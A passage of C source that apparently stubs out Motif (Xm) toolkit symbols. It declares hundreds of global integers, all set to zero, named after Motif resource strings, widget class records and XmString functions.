int _XmSCExtensionType = 0;
int _XmSCFileListItemCount = 0;
int _XmSCFileListItems = 0;
int _XmSCFileListLabelString = 0;
int _XmSCFileSearchProc = 0;
int _XmSCFileTypeMask = 0;
int _XmSCFillOnArm = 0;
int _XmSCFillOnSelect = 0;
int _XmSCFilterLabelString = 0;
int _XmSCFontList = 0;
int _XmSCFONTLIST_DEFAULT_TAG_STRING = 0;
int _XmSCForegroundThreshold = 0;
int _XmSCGadgetPixmap = 0;
int _XmScheckButton = 0;
int _XmSCHelpLabelString = 0;
int _XmSCHighlightColor = 0;
int _XmSCHighlightOnEnter = 0;
int _XmSCHighlightPixmap = 0;
int _XmSCHighlightThickness = 0;
int _XmSchildHorizontalAlignment = 0;
int _XmSchildHorizontalSpacing = 0;
int _XmSchildPlacement = 0;
int _XmSchildPosition = 0;
int _XmSchildType = 0;
int _XmSchildVerticalAlignment = 0;
int _XmSCHorizontalDimension = 0;
int _XmSCHorizontalFontUnit = 0;
int _XmSCHorizontalInt = 0;
int _XmSCHorizontalPosition = 0;
int _XmSCHorizontalScrollBar = 0;
int _XmSCHot = 0;
int _XmSCICCHandle = 0;
int _XmSCIconAttachment = 0;
int _XmSCImportTargets = 0;
int _XmSCIncrement = 0;
int _XmSCIncremental = 0;
int _XmSCIndicatorOn = 0;
int _XmSCIndicatorSize = 0;
int _XmSCIndicatorType = 0;
int _XmSCInitialDelay = 0;
int _XmSCInitialFocus = 0;
int _XmSCInputCreate = 0;
int _XmSCInputMethod = 0;
int _XmSCInvalidCursorForeground = 0;
int _XmSCIsAligned = 0;
int _XmSCIsHomogeneous = 0;
int _XmSCISO8859_DASH_1 = 0;
int _XmSCItemCount = 0;
int _XmSCItems = 0;
int _XmSCKeyboardFocusPolicy = 0;
int _XmSCKeySym = 0;
int _XmSCKeySymTable = 0;
int _XmSCLabelFontList = 0;
int _XmSCLabelInsensitivePixmap = 0;
int _XmSCLabelPixmap = 0;
int _XmSCLabelString = 0;
int _XmSCLabelType = 0;
int _XmSclientData = 0;
int _XmSCLightThreshold = 0;
int _XmSclipWindow = 0;
int _XmSCListLabelString = 0;
int _XmSCListMarginHeight = 0;
int _XmSCListMarginWidth = 0;
int _XmSCListSizePolicy = 0;
int _XmSCListSpacing = 0;
int _XmSCListUpdated = 0;
int _XmSCLogicalParent = 0;
int _XmSCMainWindowMarginHeight = 0;
int _XmSCMainWindowMarginWidth = 0;
int _XmSCManBottomShadowPixmap = 0;
int _XmSCManForegroundPixmap = 0;
int _XmSCManHighlightPixmap = 0;
int _XmSCManTopShadowPixmap = 0;
int _XmSCMappingDelay = 0;
int _XmSCMarginBottom = 0;
int _XmSCMarginHeight = 0;
int _XmSCMarginLeft = 0;
int _XmSCMarginRight = 0;
int _XmSCMarginTop = 0;
int _XmSCMarginWidth = 0;
int _XmSCMask = 0;
int _XmSCMaximum = 0;
int _XmSCMaxItems = 0;
int _XmSCMaxLength = 0;
int _XmSCMaxValue = 0;
int _XmSCMenuBar = 0;
int _XmSCMenuPost = 0;
int _XmSCMenuWidget = 0;
int _XmSCMessageProc = 0;
int _XmSCMessageWindow = 0;
int _XmSCMinimizeButtons = 0;
int _XmSCMinimum = 0;
int _XmSCMnemonic = 0;
int _XmSCMnemonicCharSet = 0;
int _XmSCMoveOpaque = 0;
int _XmSCMultiClick = 0;
int _XmSCMustMatch = 0;
int _XmSCMwmDecorations = 0;
int _XmSCMwmFunctions = 0;
int _XmSCMwmInputMode = 0;
int _XmSCMwmMenu = 0;
int _XmSCMwmMessages = 0;
int _XmSCNavigationType = 0;
int _XmSCNeedsMotion = 0;
int _XmSCNoMatchString = 0;
int _XmSCNoneCursorForeground = 0;
int _XmSCNoResize = 0;
int _XmSCNotifyProc = 0;
int _XmSCNumChildren = 0;
int _XmSCNumColumns = 0;
int _XmSCNumDropRectangles = 0;
int _XmSCNumDropTransfers = 0;
int _XmSCNumExportTargets = 0;
int _XmSCNumImportTargets = 0;
int _XmSCOffset = 0;
int _XmSCOkLabelString = 0;
int _XmScolumns = 0;
int _XmScommand = 0;
int _XmScommandChangedCallback = 0;
int _XmScommandEnteredCallback = 0;
int _XmScommandWindow = 0;
int _XmScommandWindowLocation = 0;
int _XmSconvertProc = 0;
int _XmSCOperationChangedCallback = 0;
int _XmSCOperationCursorIcon = 0;
int _XmSCOptionLabel = 0;
int _XmSCOptionMnemonic = 0;
int _XmSCOutputCreate = 0;
int _XmSCPacking = 0;
int _XmSCPageIncrement = 0;
int _XmSCPaneMaximum = 0;
int _XmSCPaneMinimum = 0;
int _XmSCPattern = 0;
int _XmSCPendingDelete = 0;
int _XmSCPopupEnabled = 0;
int _XmSCPositionIndex = 0;
int _XmSCPostFromButton = 0;
int _XmSCPostFromCount = 0;
int _XmSCPostFromList = 0;
int _XmSCPreeditType = 0;
int _XmSCPrimForegroundPixmap = 0;
int _XmSCProc = 0;
int _XmSCProcessingDirection = 0;
int _XmSCPromptString = 0;
int _XmSCProtocolCallback = 0;
int _XmSCPushButtonEnabled = 0;
int _XmSCQualifySearchDataProc = 0;
int _XmSCRadioAlwaysOne = 0;
int _XmSCRadioBehavior = 0;
int _XmSCRecomputeSize = 0;
int _XmSCRectangleList = 0;
int _XmSCRectangles = 0;
int xmScreenClass = 0;
int xmScreenClassRec = 0;
int _XmScreenGetOperationIcon = 0;
int _XmScreenGetSourceIcon = 0;
int _XmScreenGetStateIcon = 0;
int xmScreenObjectClass = 0;
int _XmScreenRemoveFromCursorCache = 0;
int _XmSCRepeatDelay = 0;
int _XmSCResizeCallback = 0;
int _XmSCResizeHeight = 0;
int _XmSCResizePolicy = 0;
int _XmSCResizeWidth = 0;
int xmScrollBarClassRec = 0;
int _XmScrollBar_defaultTranslations = 0;
int XmScrollBarGetValues = 0;
int XmScrollBarSetValues = 0;
int xmScrollBarWidgetClass = 0;
int xmScrolledWindowClassRec = 0;
int XmScrolledWindowSetAreas = 0;
int xmScrolledWindowWidgetClass = 0;
int _XmScrolledW_ScrolledWindowXlations = 0;
int XmScrollVisible = 0;
int _XmSCRowColumnType = 0;
int _XmSCRows = 0;
int _XmSCRubberPositioning = 0;
int _XmSCSashHeight = 0;
int _XmSCSashIndent = 0;
int _XmSCSashWidth = 0;
int _XmSCScaleHeight = 0;
int _XmSCScaleMultiple = 0;
int _XmSCScaleWidth = 0;
int _XmSCScroll = 0;
int _XmSCScrollBarDisplayPolicy = 0;
int _XmSCScrollBarPlacement = 0;
int _XmSCScrolledWindowMarginHeight = 0;
int _XmSCScrolledWindowMarginWidth = 0;
int _XmSCScrollingPolicy = 0;
int _XmSCScrollSide = 0;
int _XmSCSelectColor = 0;
int _XmSCSelectedItemCount = 0;
int _XmSCSelectedItems = 0;
int _XmSCSelectInsensitivePixmap = 0;
int _XmSCSelectionArrayCount = 0;
int _XmSCSelectionLabelString = 0;
int _XmSCSelectionPolicy = 0;
int _XmSCSelectionType = 0;
int _XmSCSelectPixmap = 0;
int _XmSCSelectThreshold = 0;
int _XmSCSeparatorOn = 0;
int _XmSCSeparatorType = 0;
int _XmSCSet = 0;
int _XmSCShadowThickness = 0;
int _XmSCShadowType = 0;
int _XmSCShellHorizDim = 0;
int _XmSCShellHorizPos = 0;
int _XmSCShellUnitType = 0;
int _XmSCShellVertDim = 0;
int _XmSCShellVertPos = 0;
int _XmSCShowArrows = 0;
int _XmSCShowAsDefault = 0;
int _XmSCShowSeparator = 0;
int _XmSCShowValue = 0;
int _XmSCSimpleCheckBox = 0;
int _XmSCSimpleMenuBar = 0;
int _XmSCSimpleOptionMenu = 0;
int _XmSCSimplePopupMenu = 0;
int _XmSCSimplePulldownMenu = 0;
int _XmSCSimpleRadioBox = 0;
int _XmSCSizePolicy = 0;
int _XmSCSliderSize = 0;
int _XmSCSource = 0;
int _XmSCSourceCursorIcon = 0;
int _XmSCSourceIsExternal = 0;
int _XmSCSourcePixmapIcon = 0;
int _XmSCSourceWidget = 0;
int _XmSCSourceWindow = 0;
int _XmSCSpacing = 0;
int _XmSCStartTime = 0;
int _XmSCStateCursorIcon = 0;
int _XmSCStringDirection = 0;
int _XmSCTearOffModel = 0;
int _XmSCTextFontList = 0;
int _XmSCTextString = 0;
int _XmSCTextValue = 0;
int _XmSCTitleString = 0;
int _XmSCTopCharacter = 0;
int _XmSCTopItemPosition = 0;
int _XmSCTopLevelEnterCallback = 0;
int _XmSCTopLevelLeaveCallback = 0;
int _XmSCTopShadowColor = 0;
int _XmSCTopShadowPixmap = 0;
int _XmSCTransferProc = 0;
int _XmSCTransferStatus = 0;
int _XmSCTraversalOn = 0;
int _XmSCTraversalType = 0;
int _XmSCTreeUpdateProc = 0;
int _XmSCTroughColor = 0;
int _XmSCUnitType = 0;
int _XmSCUnpostBehavior = 0;
int _XmSCUnselectPixmap = 0;
int _XmSCUpdateSliderSize = 0;
int _XmScursorBackground = 0;
int _XmScursorForeground = 0;
int _XmScursorPosition = 0;
int _XmScursorPositionVisible = 0;
int _XmSCUseAsyncGeometry = 0;
int _XmSCUserData = 0;
int _XmSCValidCursorForeground = 0;
int _XmSCValueChangedCallback = 0;
int _XmSCValueWcs = 0;
int _XmSCVerifyBell = 0;
int _XmSCVerticalAlignment = 0;
int _XmSCVerticalDimension = 0;
int _XmSCVerticalFontUnit = 0;
int _XmSCVerticalInt = 0;
int _XmSCVerticalPosition = 0;
int _XmSCVerticalScrollBar = 0;
int _XmSCVirtualBinding = 0;
int _XmSCVisibleItemCount = 0;
int _XmSCVisibleWhenOff = 0;
int _XmSCVisualPolicy = 0;
int _XmSCWhichButton = 0;
int _XmSCWordWrap = 0;
int _XmSCWorkWindow = 0;
int _XmSCXmBackgroundPixmap = 0;
int _XmSCXmFONTLIST_DEFAULT_TAG_STRING = 0;
int _XmSCXmString = 0;
int _XmSCXmStringCharSet = 0;
int _XmSCXmStringTable = 0;
int _XmSdarkThreshold = 0;
int _XmSdecimalPoints = 0;
int _XmSdecrementCallback = 0;
int _XmSdefaultActionCallback = 0;
int _XmSDEFAULT_BACKGROUND = 0;
int _XmSdefaultButton = 0;
int _XmSdefaultButtonShadowThickness = 0;
int _XmSdefaultButtonType = 0;
int _XmSdefaultCopyCursorIcon = 0;
int _XmSDEFAULT_FONT = 0;
int _XmSdefaultFontList = 0;
int _XmSdefaultInvalidCursorIcon = 0;
int _XmSdefaultLinkCursorIcon = 0;
int _XmSdefaultMoveCursorIcon = 0;
int _XmSdefaultNoneCursorIcon = 0;
int _XmSdefaultPosition = 0;
int _XmSdefaultSourceCursorIcon = 0;
int _XmSdefaultValidCursorIcon = 0;
int _XmSdeleteResponse = 0;
int _XmSdesktopParent = 0;
int _XmSdialogStyle = 0;
int _XmSdialogTitle = 0;
int _XmSdialogType = 0;
int _XmSdirectory = 0;
int _XmSdirectoryValid = 0;
int _XmSdirListItemCount = 0;
int _XmSdirListItems = 0;
int _XmSdirListLabelString = 0;
int _XmSdirMask = 0;
int _XmSdirSearchProc = 0;
int _XmSdirSpec = 0;
int _XmSdisarmCallback = 0;
int _XmSdoubleClickInterval = 0;
int _XmSdoubleSeparator = 0;
int _XmSdragCallback = 0;
int _XmSdragContextClass = 0;
int _XmSdragDropFinishCallback = 0;
int _XmSdragIconClass = 0;
int _XmSdragInitiatorProtocolStyle = 0;
int _XmSdragMotionCallback = 0;
int _XmSdragOperations = 0;
int _XmSdragOverMode = 0;
int _XmSdragProc = 0;
int _XmSdragReceiverProtocolStyle = 0;
int _XmSdropFinishCallback = 0;
int _XmSdropProc = 0;
int _XmSdropRectangles = 0;
int _XmSdropSiteActivity = 0;
int _XmSdropSiteEnterCallback = 0;
int _XmSdropSiteLeaveCallback = 0;
int _XmSdropSiteManagerClass = 0;
int _XmSdropSiteOperations = 0;
int _XmSdropSiteType = 0;
int _XmSdropStartCallback = 0;
int _XmSdropTransferClass = 0;
int _XmSdropTransfers = 0;
int _XmSearchColorCache = 0;
int _XmSecondaryResourceData = 0;
int _XmSeditable = 0;
int _XmSeditMode = 0;
int _XmSelectColorDefault = 0;
int _XmSelectioB_defaultTextAccelerators = 0;
int xmSelectionBoxClassRec = 0;
int _XmSelectionBoxCreateApplyButton = 0;
int _XmSelectionBoxCreateCancelButton = 0;
int _XmSelectionBoxCreateHelpButton = 0;
int _XmSelectionBoxCreateList = 0;
int _XmSelectionBoxCreateListLabel = 0;
int _XmSelectionBoxCreateOkButton = 0;
int _XmSelectionBoxCreateSelectionLabel = 0;
int _XmSelectionBoxCreateSeparator = 0;
int _XmSelectionBoxCreateText = 0;
int _XmSelectionBoxGeoMatrixCreate = 0;
int _XmSelectionBoxGetApplyLabelString = 0;
int _XmSelectionBoxGetCancelLabelString = 0;
int XmSelectionBoxGetChild = 0;
int _XmSelectionBoxGetHelpLabelString = 0;
int _XmSelectionBoxGetListItemCount = 0;
int _XmSelectionBoxGetListItems = 0;
int _XmSelectionBoxGetListLabelString = 0;
int _XmSelectionBoxGetListVisibleItemCount = 0;
int _XmSelectionBoxGetOkLabelString = 0;
int _XmSelectionBoxGetSelectionLabelString = 0;
int _XmSelectionBoxGetTextColumns = 0;
int _XmSelectionBoxGetTextString = 0;
int _XmSelectionBoxNoGeoRequest = 0;
int _XmSelectionBoxRestore = 0;
int _XmSelectionBoxUpOrDown = 0;
int xmSelectionBoxWidgetClass = 0;
int _XmSEMPTY_STRING = 0;
int _XmSendICCCallback = 0;
int _XmSentryAlignment = 0;
int _XmSentryBorder = 0;
int _XmSentryCallback = 0;
int _XmSentryClass = 0;
int _XmSentryVerticalAlignment = 0;
int _XmSeparatorCacheCompare = 0;
int xmSeparatorClassRec = 0;
int _XmSeparatorFix = 0;
int xmSeparatorGadgetClass = 0;
int xmSeparatorGadgetClassRec = 0;
int xmSeparatorGCacheObjClassRec = 0;
int xmSeparatorWidgetClass = 0;
int _XmSetActiveTabGroup = 0;
int _XmSetActualClass = 0;
int XmSetColorCalculation = 0;
int _XmSetDefaultBackgroundColorSpec = 0;
int _XmSetDestination = 0;
int _XmSetDragReceiverInfo = 0;
int _XmSetEtchedSlider = 0;
int _XmSetFocusFlag = 0;
int _XmSetFocusResetFlag = 0;
int XmSetFontUnit = 0;
int XmSetFontUnits = 0;
int _XmSetInDragMode = 0;
int _XmSetInitialOfTabGraph = 0;
int _XmSetInitialOfTabGroup = 0;
int _XmSetKidGeo = 0;
int _XmSetLastManagedMenuTime = 0;
int XmSetMenuCursor = 0;
int _XmSetMenuTraversal = 0;
int _XmSetPopupMenuClick = 0;
int XmSetProtocolHooks = 0;
int _XmSetRect = 0;
int _XmSetSwallowEventHandler = 0;
int _XmSetThickness = 0;
int _XmSetThicknessDefault0 = 0;
int XmSetToolTipString = 0;
int _XmSetTransientFlag = 0;
int _XmSetValuesOnChildren = 0;
int _XmSetXmDisplayClass = 0;
int _XmSexportTargets = 0;
int _XmSexposeCallback = 0;
int _XmSextendedSelectionCallback = 0;
int _XmSextensionType = 0;
int _XmSFAddNavigator = 0;
int _XmSfileListItemCount = 0;
int _XmSfileListItems = 0;
int _XmSfileListLabelString = 0;
int _XmSfileSearchProc = 0;
int _XmSfileTypeMask = 0;
int _XmSfillOnArm = 0;
int _XmSfillOnSelect = 0;
int _XmSfilterLabelString = 0;
int _XmSfocusCallback = 0;
int _XmSfocusMovedCallback = 0;
int _XmSfocusPolicyChanged = 0;
int _XmSfontList = 0;
int _XmSforegroundThreshold = 0;
int _XmSfractionBase = 0;
int _XmSFRemoveNavigator = 0;
int _XmSFUpdateNavigatorsValue = 0;
int _XmSgainPrimaryCallback = 0;
int xmShellExtClassRec = 0;
int xmShellExtObjectClass = 0;
int _XmShellIsExclusive = 0;
int _XmShelpCallback = 0;
int _XmShelpLabelString = 0;
int _XmShighlightColor = 0;
int _XmShighlightOnEnter = 0;
int _XmShighlightPixmap = 0;
int _XmShighlightThickness = 0;
int _XmShistoryItemCount = 0;
int _XmShistoryItems = 0;
int _XmShistoryMaxItems = 0;
int _XmShistoryVisibleItemCount = 0;
int _XmShorizontalFontUnit = 0;
int _XmShorizontalScrollBar = 0;
int _XmShorizontalSpacing = 0;
int _XmShotX = 0;
int _XmShotY = 0;
int _XmSiccHandle = 0;
int XmSimpleSpinBoxAddItem = 0;
int xmSimpleSpinBoxClassRec = 0;
int XmSimpleSpinBoxDeletePos = 0;
int XmSimpleSpinBoxSetItem = 0;
int xmSimpleSpinBoxWidgetClass = 0;
int _XmSimportTargets = 0;
int _XmSincrement = 0;
int _XmSincremental = 0;
int _XmSincrementCallback = 0;
int _XmSindicatorOn = 0;
int _XmSindicatorSize = 0;
int _XmSindicatorType = 0;
int _XmSinitialDelay = 0;
int _XmSinitialFocus = 0;
int _XmSinputCallback = 0;
int _XmSinputCreate = 0;
int _XmSinputMethod = 0;
int _XmSinvalidCursorForeground = 0;
int _XmSisAligned = 0;
int _XmSisHomogeneous = 0;
int _XmSitemCount = 0;
int _XmSitems = 0;
int _XmSkeyboardFocusPolicy = 0;
int _XmSlabelFontList = 0;
int _XmSlabelInsensitivePixmap = 0;
int _XmSlabelPixmap = 0;
int _XmSlabelString = 0;
int _XmSlabelType = 0;
int _XmSleep = 0;
int _XmSleftAttachment = 0;
int _XmSleftOffset = 0;
int _XmSleftPosition = 0;
int _XmSleftWidget = 0;
int xmSlideContextClassRec = 0;
int xmSlideContextWidgetClass = 0;
int _XmSlightThreshold = 0;
int _XmSlistItemCount = 0;
int _XmSlistItems = 0;
int _XmSlistLabelString = 0;
int _XmSlistMarginHeight = 0;
int _XmSlistMarginWidth = 0;
int _XmSlistSizePolicy = 0;
int _XmSlistSpacing = 0;
int _XmSlistUpdated = 0;
int _XmSlistVisibleItemCount = 0;
int _XmSlogicalParent = 0;
int _XmSlosePrimaryCallback = 0;
int _XmSlosingFocusCallback = 0;
int _XmSmainWindowMarginHeight = 0;
int _XmSmainWindowMarginWidth = 0;
int _XmSmapCallback = 0;
int _XmSmappingDelay = 0;
int _XmSmargin = 0;
int _XmSmarginBottom = 0;
int _XmSmarginHeight = 0;
int _XmSmarginLeft = 0;
int _XmSmarginRight = 0;
int _XmSmarginTop = 0;
int _XmSmarginWidth = 0;
int _XmSmask = 0;
int _XmSmaximum = 0;
int _XmSmaxLength = 0;
int _XmSmenuAccelerator = 0;
int _XmSmenuBar = 0;
int _XmSmenuCursor = 0;
int _XmSmenuHelpWidget = 0;
int _XmSmenuHistory = 0;
int _XmSmenuPost = 0;
int _XmSmessageAlignment = 0;
int _XmSmessageProc = 0;
int _XmSmessageString = 0;
int _XmSmessageWindow = 0;
int _XmSminimizeButtons = 0;
int _XmSminimum = 0;
int _XmSmnemonic = 0;
int _XmSmnemonicCharSet = 0;
int _XmSmodifyVerifyCallback = 0;
int _XmSmodifyVerifyCallbackWcs = 0;
int _XmSmotionVerifyCallback = 0;
int _XmSmoveOpaque = 0;
int _XmSmultiClick = 0;
int _XmSmultipleSelectionCallback = 0;
int _XmSmustMatch = 0;
int _XmSmwmDecorations = 0;
int _XmSmwmFunctions = 0;
int _XmSmwmInputMode = 0;
int _XmSmwmMenu = 0;
int _XmSmwmMessages = 0;
int _XmSnavigationType = 0;
int _XmSneedsMotion = 0;
int _XmSnoMatchCallback = 0;
int _XmSnoMatchString = 0;
int _XmSnoneCursorForeground = 0;
int _XmSnoResize = 0;
int _XmSnotifyProc = 0;
int _XmSnumColumns = 0;
int _XmSnumDropRectangles = 0;
int _XmSnumDropTransfers = 0;
int _XmSnumExportTargets = 0;
int _XmSnumImportTargets = 0;
int _XmSnumRectangles = 0;
int _XmSocorro = 0;
int _XmSoffsetX = 0;
int _XmSoffsetY = 0;
int _XmSokCallback = 0;
int _XmSokLabelString = 0;
int _XmSoperationChangedCallback = 0;
int _XmSoperationCursorIcon = 0;
int _XmSoptionLabel = 0;
int _XmSoptionMnemonic = 0;
int _XmSortResourceList = 0;
int _XmSosfActivate = 0;
int _XmSosfAddMode = 0;
int _XmSosfBackSpace = 0;
int _XmSosfBeginLine = 0;
int _XmSosfCancel = 0;
int _XmSosfClear = 0;
int _XmSosfCopy = 0;
int _XmSosfCut = 0;
int _XmSosfDelete = 0;
int _XmSosfDown = 0;
int _XmSosfEndLine = 0;
int _XmSosfHelp = 0;
int _XmSosfInsert = 0;
int _XmSosfLeft = 0;
int _XmSosfMenu = 0;
int _XmSosfMenuBar = 0;
int _XmSosfPageDown = 0;
int _XmSosfPageLeft = 0;
int _XmSosfPageRight = 0;
int _XmSosfPageUp = 0;
int _XmSosfPaste = 0;
int _XmSosfPrimaryPaste = 0;
int _XmSosfQuickPaste = 0;
int _XmSosfRight = 0;
int _XmSosfSelect = 0;
int _XmSosfUndo = 0;
int _XmSosfUp = 0;
int _XmSoutputCreate = 0;
int _XmSpacking = 0;
int _XmSpageDecrementCallback = 0;
int _XmSpageIncrement = 0;
int _XmSpageIncrementCallback = 0;
int _XmSpaneMaximum = 0;
int _XmSpaneMinimum = 0;
int _XmSpattern = 0;
int _XmSpendingDelete = 0;
int _XmSpinB_defaultAccelerators = 0;
int _XmSpinB_defaultTranslations = 0;
int xmSpinBoxClassRec = 0;
int XmSpinBoxValidatePosition = 0;
int xmSpinBoxWidgetClass = 0;
int _XmSpopupEnabled = 0;
int _XmSpositionIndex = 0;
int _XmSpostFromButton = 0;
int _XmSpostFromCount = 0;
int _XmSpostFromList = 0;
int _XmSpreeditType = 0;
int _XmSprocessingDirection = 0;
int _XmSpromptString = 0;
int _XmSprotocolCallback = 0;
int _XmSpushButton = 0;
int _XmSpushButtonEnabled = 0;
int _XmSqualifySearchDataProc = 0;
int _XmSradioAlwaysOne = 0;
int _XmSradioBehavior = 0;
int _XmSradioButton = 0;
int _XmSrealizeCallback = 0;
int _XmSrecomputeSize = 0;
int _XmSrectangles = 0;
int _XmSrefigureMode = 0;
int _XmSrepeatDelay = 0;
int _XmSresizable = 0;
int _XmSresizeCallback = 0;
int _XmSresizeHeight = 0;
int _XmSresizePolicy = 0;
int _XmSresizeWidth = 0;
int _XmSrightAttachment = 0;
int _XmSrightOffset = 0;
int _XmSrightPosition = 0;
int _XmSrightWidget = 0;
int _XmSrowColumnType = 0;
int _XmSrows = 0;
int _XmSrubberPositioning = 0;
int _XmSsashHeight = 0;
int _XmSsashIndent = 0;
int _XmSsashShadowThickness = 0;
int _XmSsashWidth = 0;
int _XmSscaleHeight = 0;
int _XmSscaleMultiple = 0;
int _XmSscaleWidth = 0;
int _XmSscrollBarDisplayPolicy = 0;
int _XmSscrollBarPlacement = 0;
int _XmSscrolledWindowMarginHeight = 0;
int _XmSscrolledWindowMarginWidth = 0;
int _XmSscrollHorizontal = 0;
int _XmSscrollingPolicy = 0;
int _XmSscrollLeftSide = 0;
int _XmSscrollTopSide = 0;
int _XmSscrollVertical = 0;
int _XmSselectColor = 0;
int _XmSselectedItemCount = 0;
int _XmSselectedItems = 0;
int _XmSselectInsensitivePixmap = 0;
int _XmSselectionArrayCount = 0;
int _XmSselectionLabelString = 0;
int _XmSselectionPolicy = 0;
int _XmSselectPixmap = 0;
int _XmSselectThreshold = 0;
int _XmSseparator = 0;
int _XmSseparatorOn = 0;
int _XmSseparatorType = 0;
int _XmSset = 0;
int _XmSshadow = 0;
int _XmSshadowThickness = 0;
int _XmSshadowType = 0;
int _XmSshellUnitType = 0;
int _XmSshowArrows = 0;
int _XmSshowAsDefault = 0;
int _XmSshowSeparator = 0;
int _XmSshowValue = 0;
int _XmSsimpleCallback = 0;
int _XmSsingleSelectionCallback = 0;
int _XmSsingleSeparator = 0;
int _XmSsizePolicy = 0;
int _XmSskipAdjust = 0;
int _XmSsliderSize = 0;
int _XmSsource = 0;
int _XmSsourceCursorIcon = 0;
int _XmSsourceIsExternal = 0;
int _XmSsourcePixmapIcon = 0;
int _XmSsourceWidget = 0;
int _XmSsourceWindow = 0;
int _XmSspacing = 0;
int _XmSstartTime = 0;
int _XmSstateCursorIcon = 0;
int _XmSstringDirection = 0;
int _XmSsubMenuId = 0;
int _XmSsymbolPixmap = 0;
int _XmStackFree = 0;
int _XmStackInit = 0;
int _XmStackPop = 0;
int _XmStackPush = 0;
int xm_std_constraint_filter = 0;
int xm_std_filter = 0;
int _XmStearOffMenuActivateCallback = 0;
int _XmStearOffMenuDeactivateCallback = 0;
int _XmStearOffModel = 0;
int _XmStextAccelerators = 0;
int _XmStextColumns = 0;
int _XmStextFontList = 0;
int _XmStextString = 0;
int _XmStextTranslations = 0;
int _XmStextValue = 0;
int _XmStitleString = 0;
int _XmStoBottomCallback = 0;
int _XmStopAttachment = 0;
int _XmStopCharacter = 0;
int _XmStopItemPosition = 0;
int _XmStopLevelEnterCallback = 0;
int _XmStopLevelLeaveCallback = 0;
int _XmStopOffset = 0;
int _XmStoPositionCallback = 0;
int _XmStopPosition = 0;
int _XmStopShadowColor = 0;
int _XmStopShadowPixmap = 0;
int _XmStopWidget = 0;
int _XmStoTopCallback = 0;
int _XmStransferProc = 0;
int _XmStransferStatus = 0;
int _XmStraversalCallback = 0;
int _XmStraversalOn = 0;
int _XmStraversalType = 0;
int _XmStraverseObscuredCallback = 0;
int _XmStreeUpdateProc = 0;
int _XmStringBaseline = 0;
int XmStringBaseline = 0;
int _XmStringByteCompare = 0;
int XmStringByteCompare = 0;
int XmStringByteStreamLength = 0;
int _XmStringCacheFree = 0;
int _XmStringCacheGet = 0;
int _XmStringCacheTag = 0;
int _XmStringCharacterCount = 0;
int XmStringCompare = 0;
int XmStringComponentCreate = 0;
int XmStringConcat = 0;
int XmStringConcatAndFree = 0;
int _XmStringContextCopy = 0;
int _XmStringContextFree = 0;
int _XmStringContextReInit = 0;
int _XmStringCopy = 0;
int XmStringCopy = 0;
int _XmStringCreate = 0;
int XmStringCreate = 0;
int _XmStringCreateExternal = 0;
int XmStringCreateFontList = 0;
int XmStringCreateFontList_r = 0;
int XmStringCreateLocalized = 0;
int XmStringCreateLtoR = 0;
int XmStringCreateSimple = 0;
int XmStringDirectionCreate = 0;
int XmStringDirectionToDirection = 0;
int _XmStringDraw = 0;
int XmStringDraw = 0;
int _XmStringDrawImage = 0;
int XmStringDrawImage = 0;
int _XmStringDrawLining = 0;
int _XmStringDrawMnemonic = 0;
int _XmStringDrawSegment = 0;
int _XmStringDrawUnderline = 0;
int XmStringDrawUnderline = 0;
int _XmStringEmpty = 0;
int XmStringEmpty = 0;
int _XmStringEntryCopy = 0;
int _XmStringEntryFree = 0;
int _XmStringExtent = 0;
int XmStringExtent = 0;
int _XmStringFree = 0;
int XmStringFree = 0;
int _XmStringFreeContext = 0;
int XmStringFreeContext = 0;
int XmStringGenerate = 0;
int _XmStringGetBaselines = 0;
int _XmStringGetCurrentCharset = 0;
int XmStringGetLtoR = 0;
int XmStringGetNextComponent = 0;
int _XmStringGetNextSegment = 0;
int XmStringGetNextSegment = 0;
int _XmStringGetNextTabWidth = 0;
int XmStringGetNextTriple = 0;
int _XmStringGetSegment = 0;
int _XmStringGetTextConcat = 0;
int _XmStringHasSubstring = 0;
int XmStringHasSubstring = 0;
int _XmStringHeight = 0;
int XmStringHeight = 0;
int _XmStringIndexCacheTag = 0;
int _XmStringIndexGetTag = 0;
int _XmStringInitContext = 0;
int XmStringInitContext = 0;
int _XmStringIsCurrentCharset = 0;
int XmStringIsVoid = 0;
int _XmStringIsXmString = 0;
int _XmStringLayout = 0;
int XmStringLength = 0;
int _XmStringLineCount = 0;
int XmStringLineCount = 0;
int XmStringLtoRCreate = 0;
int XmStringNConcat = 0;
int XmStringNCopy = 0;
int _XmStringNCreate = 0;
int _XmStringOptToNonOpt = 0;
int XmStringParseText = 0;
int XmStringPeekNextComponent = 0;
int XmStringPeekNextTriple = 0;
int XmStringPutRendition = 0;
int _XmStringRender = 0;
int _XmStrings = 0;
int _XmStrings22 = 0;
int _XmStrings23 = 0;
int _XmStringsAreEqual = 0;
int XmStringSegmentCreate = 0;
int _XmStringSegmentExtents = 0;
int _XmStringSegmentNew = 0;
int XmStringSeparatorCreate = 0;
int _XmStringsI = 0;
int _XmStringSingleSegment = 0;
int _XmStringSourceCreate = 0;
int _XmStringSourceDestroy = 0;
int _XmStringSourceFindString = 0;
int _XmStringSourceGetEditable = 0;
int _XmStringSourceGetMaxLength = 0;
int _XmStringSourceGetPending = 0;
int _XmStringSourceGetString = 0;
int _XmStringSourceGetValue = 0;
int _XmStringSourceHasSelection = 0;
int _XmStringSourceSetEditable = 0;
int _XmStringSourceSetGappedBuffer = 0;
int _XmStringSourceSetMaxLength = 0;
int _XmStringSourceSetPending = 0;
int _XmStringSourceSetValue = 0;
int XmStringTableParseStringArray = 0;
int XmStringTableProposeTablist = 0;
int XmStringTableToXmString = 0;
int XmStringTableUnparse = 0;
int XmStringToXmStringTable = 0;
int _XmStringTruncateASN1 = 0;
int _XmStringUngenerate = 0;
int XmStringUnparse = 0;
int _XmStringUpdate = 0;
int _XmStringUpdateWMShellTitle = 0;
int _XmStringWidth = 0;
int XmStringWidth = 0;
int _XmStroughColor = 0;
int _XmSunitType = 0;
int _XmSunmapCallback = 0;
int _XmSunpostBehavior = 0;
int _XmSunselectPixmap = 0;
int _XmSupdateSliderSize = 0;
int _XmSuseAsyncGeometry = 0;
int _XmSuserData = 0;
int _XmSvalidCursorForeground = 0;
int _XmSvalueChangedCallback = 0;
int _XmSvalueWcs = 0;
int _XmSverifyBell = 0;
int _XmSverticalFontUnit = 0;
int _XmSverticalScrollBar = 0;
int _XmSverticalSpacing = 0;
int _XmSvisibleItemCount = 0;
int _XmSvisibleWhenOff = 0;
int _XmSvisualPolicy = 0;
int _XmSWGetClipArea = 0;
int _XmSwhichButton = 0;
int _XmSWNotifyGeoChange = 0;
int _XmSwordWrap = 0;
int _XmSworkWindow = 0;
int _XmSyncDropSiteTree = 0;
int XmTabAttributesFree = 0;
int XmTabbedStackListAppend = 0;
